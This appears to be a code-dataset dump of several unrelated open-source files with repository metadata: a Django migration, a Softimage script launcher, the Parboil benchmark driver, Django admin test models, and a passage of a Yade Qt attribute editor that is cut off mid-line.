# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding M2M table for field studies_for on 'Treatment' m2m_table_name = db.shorten_name(u'pbl_treatment_studies_for') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)), ('study', models.ForeignKey(orm[u'pbl.study'], null=False)) )) db.create_unique(m2m_table_name, ['treatment_id', 'study_id']) # Adding M2M table for field studies_against on 'Treatment' m2m_table_name = db.shorten_name(u'pbl_treatment_studies_against') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)), ('study', models.ForeignKey(orm[u'pbl.study'], null=False)) )) db.create_unique(m2m_table_name, ['treatment_id', 'study_id']) # Removing M2M table for field treatment on 'Study' db.delete_table(db.shorten_name(u'pbl_study_treatment')) def backwards(self, orm): # Removing M2M table for field studies_for on 'Treatment' db.delete_table(db.shorten_name(u'pbl_treatment_studies_for')) # Removing M2M table for field studies_against on 'Treatment' db.delete_table(db.shorten_name(u'pbl_treatment_studies_against')) # Adding M2M table for field treatment on 'Study' m2m_table_name = db.shorten_name(u'pbl_study_treatment') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('study', models.ForeignKey(orm[u'pbl.study'], null=False)), ('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)) )) db.create_unique(m2m_table_name, ['study_id', 'treatment_id']) models = { u'pbl.study': { 'Meta': {'ordering': "('title',)", 'object_name': 'Study'}, 'author': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'funder': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'journal': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'year': ('django.db.models.fields.IntegerField', [], {'default': '2014', 'max_length': '4'}) }, u'pbl.treatment': { 'Meta': {'ordering': "('name',)", 'object_name': 'Treatment'}, 'description': ('django.db.models.fields.TextField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}), 'studies_against': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_against+'", 'blank': 'True', 'to': u"orm['pbl.Study']"}), 'studies_for': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_for+'", 'blank': 'True', 'to': u"orm['pbl.Study']"}) } } complete_apps = ['pbl']
mit
-9,074,300,691,962,626,000
51.126761
195
0.592703
false
blurstudio/cross3d
cross3d/softimage/external.py
1
4267
## # \namespace cross3d.softimage.external # # \remarks This class can be used even outside of softimage. It gives you info on where # softimage is installed, and allows you to run scripts in softimage. # To Access this class use: cross3d.external('softimage') # # \author dougl # \author Blur Studio # \date 01/21/14 # #------------------------------------------------------------------------------------------------------------------------ import os import subprocess import xml.etree.cElementTree as ET from cross3d import Exceptions from cross3d.constants import ScriptLanguage from cross3d.abstract.external import External as AbstractExternal #------------------------------------------------------------------------------------------------------------------------ class External(AbstractExternal): # In case the software is installed but not used don't find it when not passing in a version _ignoredVersions = set(os.environ.get('CROSS3D_STUDIO_IGNORED_SOFTIMAGE', '').split(',')) # map years to version numbers _yearForVersion = {'8': '2010', '9': '2011', '10': '2012', '11': '2013', '12': '2014', '13': '2015'} @classmethod def name(cls): return 'Softimage' @classmethod def getFileVersion(cls, filepath): """ Reads the xsi version of an xsi file from the associated scntoc. """ scntoc_path = filepath + 'toc' if os.path.isfile(scntoc_path): tree = ET.parse(scntoc_path) root = tree.getroot() return root.get('xsi_version') return None @classmethod def runScript(cls, script, version=None, architecture=64, language=ScriptLanguage.Python, debug=False, headless=True): if os.path.exists(script): scriptPath = script else: scriptPath = cls.scriptPath() with open(scriptPath, "w") as fle: fle.write(script) binary = os.path.join(cls.binariesPath(version, architecture), 'xsibatch.exe' if headless else 'xsi.exe') scriptArgumentName = '-script' if headless else '-uiscript' # Contrinue makes sure there is no prompts. command = [binary, '-continue', scriptArgumentName, scriptPath] # Processing means that it will not shot the GUI and not grab a license. if headless: command.insert(1, '-processing') process = subprocess.Popen(command, stdout=subprocess.PIPE) # TODO: This is the way to check for success. But it is blocking. # Writing the log file. with open(cls.scriptLog(), 'w') as fle: fle.write(process.stdout.read()) # Checking the error in the log file. with open(cls.scriptLog()) as fle: content = fle.read() return False if 'FATAL' in content else True @classmethod def binariesPath(cls, version=None, architecture=64, language='English'): """ Finds the install path for various software installations. If version is None, the default it will return the latest installed version of the software. Raises cross3d.Exceptions.SoftwareNotInstalled if the software is not installed. :param version: The version of the software. Default is None :param architecture: The bit type to query the registry for(32, 64). Default is 64 :param language: Optional language that may be required for specific softwares. """ from cross3d.migrate import winregistry hive = 'HKEY_LOCAL_MACHINE' hkey = r'Software\Autodesk\Softimage\InstallPaths' ret = None if version == None: # Find the latest version versions = winregistry.listRegKeyValues(hive, hkey, architecture=architecture) for version in sorted(versions, key= lambda i: i[0], reverse=True): if version[0] not in cls._ignoredVersions: ret = version[1] break else: version = cls._yearForVersion.get(unicode(version), version) try: ret = winregistry.registryValue(hive, hkey, unicode(version), architecture)[0] except WindowsError: raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language) # If the version is not installed this will return '.', we want to return False. if ret: return os.path.join(os.path.normpath(ret), 'Application', 'bin') raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language)
mit
-2,558,668,745,692,272,000
36.790909
121
0.669088
false
Geof23/SESABench_II
parboil/driver/benchmark.py
1
19162
# (c) 2007 The Board of Trustees of the University of Illinois. import sys import os from os import path import re from itertools import imap, repeat, chain import globals import process import parboilfile as pbf from futures import Future from error import ErrorType class Benchmark(object): """A benchmark. If the benchmark is malformed or otherwise invalid, only the 'name' and 'invalid' fields will be set. Otherwise all fields will be set. Fields: name The name of the benchmark. This is also the benchmark directory name. invalid None if the benchmark is valid; otherwise, an exception describing why the benchmark is invalid. path Full path of the benchmark directory. descr A description of the benchmark. impls A dictionary of benchmark source implementations. datas A dictionary of data sets used to run the benchmark.""" def __init__(self, name, path = None, impls = [], datasets = [], description=None, invalid=None): self.name = name self.invalid = invalid if invalid is None: self.path = path self.impls = dict(imap(lambda i: (i.name, i), impls)) self.datas = dict(imap(lambda i: (i.name, i), datasets)) self.descr = description def createFromName(name): """Scan the benchmark directory for the benchmark named 'name' and create a benchmark object for it.""" bmkdir = globals.benchdir.getChildByName(name) datadir = globals.datadir.getChildByName(name) descr = process.read_description_file(bmkdir) try: # Scan implementations of the benchmark impls = [BenchImpl.createFromDir(impl) for impl in process.scan_for_benchmark_versions(bmkdir)] # Scan data sets of the benchmark datas = [BenchDataset.createFromDir(data) for data in process.scan_for_benchmark_datasets(datadir)] # If no exception occurred, the benchmark is valid return Benchmark(name, bmkdir.getPath(), impls, datas, descr) finally: pass #except Exception, e: # return Benchmark(name, invalid=e) createFromName = staticmethod(createFromName) def describe(self): """Return a string describing this benchmark.""" if self.invalid: return "Error in benchmark:\n" + str(self.invalid) if self.descr is None: header = "Benchmark '" + self.name + "'" else: header = self.descr impls = " ".join([impl.name for impl in self.impls.itervalues()]) datas = " ".join([data.name for data in self.datas.itervalues()]) return header + "\nVersions: " + impls + "\nData sets: " + datas def instance_check(x): if not isinstance(x, Benchmark): raise TypeError, "argument must be an instance of Benchmark" instance_check = staticmethod(instance_check) class BenchImpl(object): """An implementation of a benchmark.""" def __init__(self, dir, description=None): if not isinstance(dir, pbf.Directory): raise TypeEror, "dir must be a directory" self.name = dir.getName() self.dir = dir self.descr = description def createFromDir(dir): """Scan the directory containing a benchmark implementation and create a BenchImpl object from it.""" # Get the description from a file, if provided descr = process.read_description_file(dir) return BenchImpl(dir, descr) createFromDir = staticmethod(createFromDir) def makefile(self, benchmark, target=None, action=None, platform=None, opt={}): """Run this implementation's makefile.""" self.platform = platform Benchmark.instance_check(benchmark) def perform(): srcdir = path.join('src', self.name) builddir = path.join('build', self.name) if self.platform == None: platform = 'default' else: platform = self.platform env={'SRCDIR':srcdir, 'BUILDDIR':builddir + '_' + platform, 'BIN':path.join(builddir+'_'+platform,benchmark.name), 'PARBOIL_ROOT':globals.root, 'PLATFORM':platform, 'BUILD':self.name} env.update(opt) mkfile = globals.root + os.sep + 'common' + os.sep + 'mk' # Run the makefile to build the benchmark ret = process.makefile(target=target, action=action, filepath=path.join(mkfile, "Makefile"), env=env) if ret == True: return ErrorType.Success else: return ErrorType.CompileError # Go to the benchmark directory before building return process.with_path(benchmark.path, perform) def build(self, benchmark, platform): """Build an executable of this benchmark implementation.""" return self.makefile(benchmark, action='build', platform=platform) def isBuilt(self, benchmark, platform): """Determine whether the executable is up to date.""" return self.makefile(benchmark, action='q', platform=platform) == ErrorType.Success def clean(self, benchmark, platform): """Remove build files for this benchmark implementation.""" return self.makefile(benchmark, action='clean', platform=platform) def run(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None): """Run this benchmark implementation. Return True if the benchmark terminated normally or False if there was an error.""" if platform == None: self.platform = 'default' else: self.platform = platform # Ensure that the benchmark has been built if not self.isBuilt(benchmark, platform): rc = self.build(benchmark, platform) # Stop if 'make' failed if rc != ErrorType.Success: return rc def perform(): if self.platform == None: platform = 'default' else: platform = self.platform # Run the program #exename = path.join('build', self.name+'_'+platform, benchmark.name) #args = [exename] + extra_opts + dataset.getCommandLineArguments(benchmark, do_output) #rc = process.spawnwaitv(exename, args) args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output) args = reduce(lambda x, y: x + ' ' + y, args) ### try: rc = self.makefile(benchmark, action='run', platform=platform, opt={"ARGS":args}) except KeyboardInterrupt: rc = ErrorType.Killed # Program exited with error? # if rc != 0: return ErrorType.RunFailed # return ErrorType.Success return rc return process.with_path(benchmark.path, perform) def debug(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None): """Debug this benchmark implementation.""" if platform == None: self.platform = 'default' else: self.platform = platform # Ensure that the benchmark has been built if not self.isBuilt(benchmark, platform): rc = self.build(benchmark, platform) # Stop if 'make' failed if rc != ErrorType.Success: return rc def perform(): if self.platform == None: platform = 'default' else: platform = self.platform # Run the program args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output) args = reduce(lambda x, y: x + ' ' + y, args) ### rc = self.makefile(benchmark, action='debug', platform=platform, opt={"ARGS":args}) # Program exited with error? if rc != 0: return ErrorType.RunFailed return ErrorType.Success return process.with_path(benchmark.path, perform) def check(self, benchmark, dataset): """Check the output from the last run of this benchmark implementation. Return True if the output checks successfully or False otherwise.""" def perform(): output_file = dataset.getTemporaryOutputFile(benchmark).getPath() reference_file = dataset.getReferenceOutputPath() compare = os.path.join('tools', 'compare-output') rc = process.spawnwaitl(compare, compare, reference_file, output_file) # Program exited with error, or mismatch in output? if rc != 0: return False return True return process.with_path(benchmark.path, perform) def __str__(self): return "<BenchImpl '" + self.name + "'>" class BenchDataset(object): """Data sets for running a benchmark.""" def __init__(self, dir, in_files=[], out_files=[], parameters=[], description=None): if not isinstance(dir, pbf.Directory): raise TypeError, "dir must be a pbf.Directory" self.name = dir.getName() self.dir = dir self.inFiles = in_files self.outFiles = out_files self.parameters = parameters self.descr = description def createFromDir(dir): """Scan the directory containing a dataset and create a BenchDataset object from it.""" # Identify the paths where files may be found input_dir = dir.getChildByName('input') output_dir = dir.getChildByName('output') #benchmark_path = path.join(globals.root, 'benchmarks', name) def check_default_input_files(): # This function is called to see if the input file set # guessed by scanning the input directory can be used if invalid_default_input_files: raise ValueError, "Cannot infer command line when there are multiple input files in a data set\n(Fix by adding an input DESCRIPTION file)" if input_dir.exists(): input_descr = process.read_description_file(input_dir) input_files = input_dir.scanAndReturnNames() # If more than one input file was found, cannot use the default # input file list produced by scanning the directory invalid_default_input_files = len(input_files) > 1 else: # If there's no input directory, assume the benchmark # takes no input input_descr = None input_files = [] invalid_default_input_files = False # Read the text of the input description file if input_descr is not None: (parameters, input_files1, input_descr) = \ unpack_dataset_description(input_descr, input_files=None) if input_files1 is None: # No override value given; use the default check_default_input_files() else: input_files = input_files1 else: check_default_input_files() parameters = [] # Look for output files output_descr = process.read_description_file(output_dir) output_files = output_dir.scanAndReturnNames() if len(output_files) > 1: raise ValueError, "Multiple output files not supported" # Concatenate input and output descriptions if input_descr and output_descr: descr = input_descr + "\n\n" + output_descr else: descr = input_descr or output_descr return BenchDataset(dir, input_files, output_files, parameters, descr) createFromDir = staticmethod(createFromDir) def getName(self): """Get the name of this dataset.""" return self.name def getTemporaryOutputDir(self, benchmark): """Get the pbf.Directory for the output of a benchmark run. This function should always return the same pbf.Directory if its parameters are the same. The output path is not the path where the reference output is stored.""" rundir = globals.benchdir.getChildByName(benchmark.name).getChildByName('run') if rundir.getChildByName(self.name) is None: datasetpath = path.join(rundir.getPath(), self.name) filepath = path.join(datasetpath, self.outFiles[0]) rundir.addChild(pbf.Directory(datasetpath, [pbf.File(filepath, False)])) return rundir.getChildByName(self.name) def getTemporaryOutputFile(self, benchmark): """Get the pbf.File for the output of a benchmark run. This function should always return the same pbf.File if its parameters are the same. The output path is not where the referrence output is stored.""" return self.getTemporaryOutputDir(benchmark).getChildByName(self.outFiles[0]) def getReferenceOutputPath(self): """Get the name of the reference file, to which the output of a benchmark run should be compared.""" return path.join(self.dir.getPath(), 'output', self.outFiles[0]) def getCommandLineArguments(self, benchmark, do_output=True): """Get the command line arguments that should be passed to the executable to run this data set. If 'output' is True, then the executable will be passed flags to save its output to a file. Directories to hold ouptut files are created if they do not exist.""" args = [] # Add arguments to pass input files to the benchmark if self.inFiles: in_files = ",".join([path.join(self.dir.getPath(),'input', x) for x in self.inFiles]) args.append("-i") args.append(in_files) # Add arguments to store the output somewhere, if output is # desired if do_output and self.outFiles: if len(self.outFiles) != 1: raise ValueError, "only one output file is supported" out_file = self.getTemporaryOutputFile(benchmark) args.append("-o") args.append(out_file.getPath()) # Ensure that a directory exists for the output self.getTemporaryOutputDir(benchmark).touch() args += self.parameters return args def __str__(self): return "<BenchData '" + self.name + "'>" def unpack_dataset_description(descr, parameters=[], input_files=[]): """Read information from the raw contents of a data set description file. Optional 'parameters' and 'input_files' arguments may be given, which will be retained unless overridden by the description file.""" leftover = [] split_at_colon = re.compile(r"^\s*([a-zA-Z]+)\s*:(.*)$") # Initialize these to default empty strings parameter_text = None input_file_text = None # Scan the description line by line for line in descr.split('\n'): m = split_at_colon.match(line) if m is None: continue # This line appears to declare something that should be # interpreted keyword = m.group(1) if keyword == "Parameters": parameter_text = m.group(2) elif keyword == "Inputs": input_file_text = m.group(2) # else, ignore the line # Split the strings into (possibly) multiple arguments, discarding # whitespace if parameter_text is not None: parameters = parameter_text.split() if input_file_text is not None: input_files = input_file_text.split() return (parameters, input_files, descr) def version_scanner(): """version_scanner() -> (path -> pbf.Directory) Return a function to find benchmark versions in the src directory for the benchmark.""" return lambda x: pbf.scan_file(x, True, lambda y: pbf.Directory(y), ['.svn']) def find_benchmarks(): """Find benchmarks in the repository. The benchmarks are identified, but their contents are not scanned immediately. A dictionary is returned mapping benchmark names to futures containing the benchmarks.""" if not globals.root: raise ValueError, "root directory has not been set" # Scan all benchmarks in the 'benchmarks' directory and # lazily create benchmark objects. db = {} try: globals.benchdir.scan() globals.datadir.scan() for bmkdir in globals.benchdir.getScannedChildren(): bmk = Future(lambda bmkdir=bmkdir: Benchmark.createFromName(bmkdir.getName())) db[bmkdir.getName()] = bmk except OSError, e: sys.stdout.write("Benchmark directory not found!\n\n") return {} return db def _desc_file(dpath): """_desc_file(dpath) Returns a pbf.File for an optional description file in the directory dpath.""" return pbf.File(path.join(dpath,'DESCRIPTION'), False) def benchmark_scanner(): """benchmark_scanner -> (path -> pbf.Directory) Returns a function which will scan a filename and create a pbf.Directory for a benchmark represented by that name.""" def create_benchmark_dir(dpath): expected = [pbf.Directory(path.join(dpath,'src'), [], version_scanner()), pbf.Directory(path.join(dpath,'tools'), [pbf.File(path.join(dpath,'compare-output'))]), pbf.Directory(path.join(dpath,'build'), must_exist=False), pbf.Directory(path.join(dpath,'run'), must_exist=False), _desc_file(dpath)] return pbf.Directory(dpath, expected) return lambda x: pbf.scan_file(x, True, create_benchmark_dir,['_darcs','.svn']) def dataset_scanner(): """dataset_scanner -> (path -> pbf.Directory) Returns a function which will scan a filename and create a pbf.Directory for a folder containing datasets for the benchmark of the same name.""" def create_dataset_dir(dpath): simple_scan = lambda x: pbf.scan_file(x) expected = [pbf.Directory(path.join(dpath,'input'), [_desc_file(path.join(dpath,'input'))], simple_scan), pbf.Directory(path.join(dpath,'output'), [], simple_scan), _desc_file(dpath)] return pbf.Directory(dpath, expected) return lambda x: pbf.scan_file(x, True, create_dataset_dir, ['.svn', '_darcs']) def dataset_repo_scanner(): """dataset_repo_scanner -> (path -> pbf.Directory) Returns a function which will scan a filename and create a pbf.Directory for a folder containing a dataset repository for parboil benchmarks.""" benchmark_dsets_scanner = lambda x: pbf.Directory(x, [], dataset_scanner()) return lambda x: pbf.scan_file(x, True, benchmark_dsets_scanner)
mit
-8,829,396,101,898,536,000
35.921002
154
0.608235
false
theo-l/django
tests/admin_inlines/models.py
10
7855
""" Testing of admin inline formsets. """ import random from django.contrib.contenttypes.fields import GenericForeignKey from django.contrib.contenttypes.models import ContentType from django.db import models class Parent(models.Model): name = models.CharField(max_length=50) def __str__(self): return self.name class Teacher(models.Model): name = models.CharField(max_length=50) def __str__(self): return self.name class Child(models.Model): name = models.CharField(max_length=50) teacher = models.ForeignKey(Teacher, models.CASCADE) content_type = models.ForeignKey(ContentType, models.CASCADE) object_id = models.PositiveIntegerField() parent = GenericForeignKey() def __str__(self): return 'I am %s, a child of %s' % (self.name, self.parent) class Book(models.Model): name = models.CharField(max_length=50) def __str__(self): return self.name class Author(models.Model): name = models.CharField(max_length=50) books = models.ManyToManyField(Book) class NonAutoPKBook(models.Model): rand_pk = models.IntegerField(primary_key=True, editable=False) author = models.ForeignKey(Author, models.CASCADE) title = models.CharField(max_length=50) def save(self, *args, **kwargs): while not self.rand_pk: test_pk = random.randint(1, 99999) if not NonAutoPKBook.objects.filter(rand_pk=test_pk).exists(): self.rand_pk = test_pk super().save(*args, **kwargs) class NonAutoPKBookChild(NonAutoPKBook): pass class EditablePKBook(models.Model): manual_pk = models.IntegerField(primary_key=True) author = models.ForeignKey(Author, models.CASCADE) title = models.CharField(max_length=50) class Holder(models.Model): dummy = models.IntegerField() class Inner(models.Model): dummy = models.IntegerField() holder = models.ForeignKey(Holder, models.CASCADE) readonly = models.CharField("Inner readonly label", max_length=1) def get_absolute_url(self): return '/inner/' class Holder2(models.Model): dummy = models.IntegerField() class Inner2(models.Model): dummy = models.IntegerField() holder = models.ForeignKey(Holder2, models.CASCADE) class Holder3(models.Model): dummy = models.IntegerField() class Inner3(models.Model): dummy = models.IntegerField() holder = models.ForeignKey(Holder3, models.CASCADE) # Models for ticket #8190 class Holder4(models.Model): dummy = models.IntegerField() class Inner4Stacked(models.Model): dummy = models.IntegerField(help_text="Awesome stacked help text is awesome.") holder = models.ForeignKey(Holder4, models.CASCADE) class Meta: constraints = [ models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_stacked_dummy_per_holder') ] class Inner4Tabular(models.Model): dummy = models.IntegerField(help_text="Awesome tabular help text is awesome.") holder = models.ForeignKey(Holder4, models.CASCADE) class Meta: constraints = [ models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_tabular_dummy_per_holder') ] # Models for ticket #31441 class Holder5(models.Model): dummy = models.IntegerField() class Inner5Stacked(models.Model): name = models.CharField(max_length=10) select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10) text = models.TextField() dummy = models.IntegerField() holder = models.ForeignKey(Holder5, models.CASCADE) class Inner5Tabular(models.Model): name = models.CharField(max_length=10) select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10) text = models.TextField() dummy = models.IntegerField() holder = models.ForeignKey(Holder5, models.CASCADE) # Models for #12749 class Person(models.Model): firstname = models.CharField(max_length=15) class OutfitItem(models.Model): name = models.CharField(max_length=15) class Fashionista(models.Model): person = models.OneToOneField(Person, models.CASCADE, primary_key=True) weaknesses = models.ManyToManyField(OutfitItem, through='ShoppingWeakness', blank=True) class ShoppingWeakness(models.Model): fashionista = models.ForeignKey(Fashionista, models.CASCADE) item = models.ForeignKey(OutfitItem, models.CASCADE) # Models for #13510 class TitleCollection(models.Model): pass class Title(models.Model): collection = models.ForeignKey(TitleCollection, models.SET_NULL, blank=True, null=True) title1 = models.CharField(max_length=100) title2 = models.CharField(max_length=100) # Models for #15424 class Poll(models.Model): name = models.CharField(max_length=40) class Question(models.Model): text = models.CharField(max_length=40) poll = models.ForeignKey(Poll, models.CASCADE) class Novel(models.Model): name = models.CharField(max_length=40) class NovelReadonlyChapter(Novel): class Meta: proxy = True class Chapter(models.Model): name = models.CharField(max_length=40) novel = models.ForeignKey(Novel, models.CASCADE) class FootNote(models.Model): """ Model added for ticket 19838 """ chapter = models.ForeignKey(Chapter, models.PROTECT) note = models.CharField(max_length=40) # Models for #16838 class CapoFamiglia(models.Model): name = models.CharField(max_length=100) class Consigliere(models.Model): name = models.CharField(max_length=100, help_text='Help text for Consigliere') capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+') class SottoCapo(models.Model): name = models.CharField(max_length=100) capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+') class ReadOnlyInline(models.Model): name = models.CharField(max_length=100, help_text='Help text for ReadOnlyInline') capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE) # Models for #18433 class ParentModelWithCustomPk(models.Model): my_own_pk = models.CharField(max_length=100, primary_key=True) name = models.CharField(max_length=100) class ChildModel1(models.Model): my_own_pk = models.CharField(max_length=100, primary_key=True) name = models.CharField(max_length=100) parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE) def get_absolute_url(self): return '/child_model1/' class ChildModel2(models.Model): my_own_pk = models.CharField(max_length=100, primary_key=True) name = models.CharField(max_length=100) parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE) def get_absolute_url(self): return '/child_model2/' # Models for #19425 class BinaryTree(models.Model): name = models.CharField(max_length=100) parent = models.ForeignKey('self', models.SET_NULL, null=True, blank=True) # Models for #19524 class LifeForm(models.Model): pass class ExtraTerrestrial(LifeForm): name = models.CharField(max_length=100) class Sighting(models.Model): et = models.ForeignKey(ExtraTerrestrial, models.CASCADE) place = models.CharField(max_length=100) # Models for #18263 class SomeParentModel(models.Model): name = models.CharField(max_length=1) class SomeChildModel(models.Model): name = models.CharField(max_length=1) position = models.PositiveIntegerField() parent = models.ForeignKey(SomeParentModel, models.CASCADE) readonly_field = models.CharField(max_length=1) # Other models class ProfileCollection(models.Model): pass class Profile(models.Model): collection = models.ForeignKey(ProfileCollection, models.SET_NULL, blank=True, null=True) first_name = models.CharField(max_length=100) last_name = models.CharField(max_length=100)
bsd-3-clause
4,038,649,694,587,854,300
24.669935
103
0.708466
false
bchareyre/ratchet
gui/qt4/SerializableEditor.py
1
34633
# encoding: utf-8 from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4 import QtGui import re,itertools import logging logging.trace=logging.debug logging.basicConfig(level=logging.INFO) from yade import * import yade.qt try: from minieigen import * except ImportError: from miniEigen import * seqSerializableShowType=True # show type headings in serializable sequences (takes vertical space, but makes the type hyperlinked) # BUG: cursor is moved to the beginnign of the input field even if it has focus # # checking for focus seems to return True always and cursor is never moved # # the 'True or' part effectively disables the condition (so that the cursor is moved always), but it might be fixed in the future somehow # # if True or w.hasFocus(): w.home(False) # # def makeWrapperHref(text,className,attr=None,static=False): """Create clickable HTML hyperlink to a Yade class or its attribute. :param className: name of the class to link to. :param attr: attribute to link to. If given, must exist directly in given *className*; if not given or empty, link to the class itself is created and *attr* is ignored. :return: HTML with the hyperref. """ if not static: return '<a href="%s#yade.wrapper.%s%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,(('.'+attr) if attr else ''),text) else: return '<a href="%s#ystaticattr-%s.%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,attr,text) def serializableHref(ser,attr=None,text=None): """Return HTML href to a *ser* optionally to the attribute *attr*. The class hierarchy is crawled upwards to find out in which parent class is *attr* defined, so that the href target is a valid link. In that case, only single inheritace is assumed and the first class from the top defining *attr* is used. :param ser: object of class deriving from :yref:`Serializable`, or string; if string, *attr* must be empty. :param attr: name of the attribute to link to; if empty, linke to the class itself is created. :param text: visible text of the hyperlink; if not given, either class name or attribute name without class name (when *attr* is not given) is used. :returns: HTML with the hyperref. """ # klass is a class name given as string if isinstance(ser,str): if attr: raise InvalidArgument("When *ser* is a string, *attr* must be empty (only class link can be created)") return makeWrapperHref(text if text else ser,ser) # klass is a type object if attr: klass=ser.__class__ while attr in dir(klass.__bases__[0]): klass=klass.__bases__[0] if not text: text=attr else: klass=ser.__class__ if not text: text=klass.__name__ return makeWrapperHref(text,klass.__name__,attr,static=(attr and getattr(klass,attr)==getattr(ser,attr))) class AttrEditor(): """Abstract base class handing some aspects common to all attribute editors. Holds exacly one attribute which is updated whenever it changes.""" def __init__(self,getter=None,setter=None): self.getter,self.setter=getter,setter self.hot,self.focused=False,False self.widget=None def refresh(self): pass def update(self): pass def isHot(self,hot=True): "Called when the widget gets focus; mark it hot, change colors etc." if hot==self.hot: return self.hot=hot if hot: self.setStyleSheet('QWidget { background: red }') else: self.setStyleSheet('QWidget { background: none }') def sizeHint(self): return QSize(150,12) def trySetter(self,val): try: self.setter(val) except AttributeError: self.setEnabled(False) self.isHot(False) class AttrEditor_Bool(AttrEditor,QFrame): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.checkBox=QCheckBox(self) lay=QVBoxLayout(self); lay.setSpacing(0); lay.setMargin(0); lay.addStretch(1); lay.addWidget(self.checkBox); lay.addStretch(1) self.checkBox.clicked.connect(self.update) def refresh(self): self.checkBox.setChecked(self.getter()) def update(self): self.trySetter(self.checkBox.isChecked()) class AttrEditor_Int(AttrEditor,QSpinBox): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QSpinBox.__init__(self,parent) self.setRange(int(-1e9),int(1e9)); self.setSingleStep(1); self.valueChanged.connect(self.update) def refresh(self): self.setValue(self.getter()) def update(self): self.trySetter(self.value()) class AttrEditor_Str(AttrEditor,QLineEdit): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QLineEdit.__init__(self,parent) self.textEdited.connect(self.isHot) self.selectionChanged.connect(self.isHot) self.editingFinished.connect(self.update) def refresh(self): self.setText(self.getter()) def update(self): self.trySetter(str(self.text())) class AttrEditor_Float(AttrEditor,QLineEdit): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QLineEdit.__init__(self,parent) self.textEdited.connect(self.isHot) self.selectionChanged.connect(self.isHot) self.editingFinished.connect(self.update) def refresh(self): self.setText(str(self.getter())); if True or not self.hasFocus(): self.home(False) def update(self): try: self.trySetter(float(self.text())) except ValueError: self.refresh() class AttrEditor_Quaternion(AttrEditor,QFrame): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.grid=QHBoxLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for i in range(4): if i==3: f=QFrame(self); f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4) # add vertical divider (axis | angle) self.grid.addWidget(f) w=QLineEdit('') self.grid.addWidget(w); w.textEdited.connect(self.isHot) w.selectionChanged.connect(self.isHot) w.editingFinished.connect(self.update) def refresh(self): val=self.getter(); axis,angle=val.toAxisAngle() for i in (0,1,2,4): w=self.grid.itemAt(i).widget(); w.setText(str(axis[i] if i<3 else angle)); if True or not w.hasFocus(): w.home(False) def update(self): try: x=[float((self.grid.itemAt(i).widget().text())) for i in (0,1,2,4)] except ValueError: self.refresh() q=Quaternion(Vector3(x[0],x[1],x[2]),x[3]); q.normalize() # from axis-angle self.trySetter(q) def setFocus(self): self.grid.itemAt(0).widget().setFocus() class AttrEditor_Se3(AttrEditor,QFrame): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for row,col in itertools.product(range(2),range(5)): # one additional column for vertical line in quaternion if (row,col)==(0,3): continue if (row,col)==(0,4): self.grid.addWidget(QLabel(u'←<i>pos</i> ↙<i>ori</i>',self),row,col); continue if (row,col)==(1,3): f=QFrame(self); f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4); self.grid.addWidget(f,row,col); continue w=QLineEdit('') self.grid.addWidget(w,row,col); w.textEdited.connect(self.isHot) w.selectionChanged.connect(self.isHot) w.editingFinished.connect(self.update) def refresh(self): pos,ori=self.getter(); axis,angle=ori.toAxisAngle() for i in (0,1,2,4): w=self.grid.itemAtPosition(1,i).widget(); w.setText(str(axis[i] if i<3 else angle)); if True or not w.hasFocus(): w.home(False) for i in (0,1,2): w=self.grid.itemAtPosition(0,i).widget(); w.setText(str(pos[i])); if True or not w.hasFocus(): w.home(False) def update(self): try: q=[float((self.grid.itemAtPosition(1,i).widget().text())) for i in (0,1,2,4)] v=[float((self.grid.itemAtPosition(0,i).widget().text())) for i in 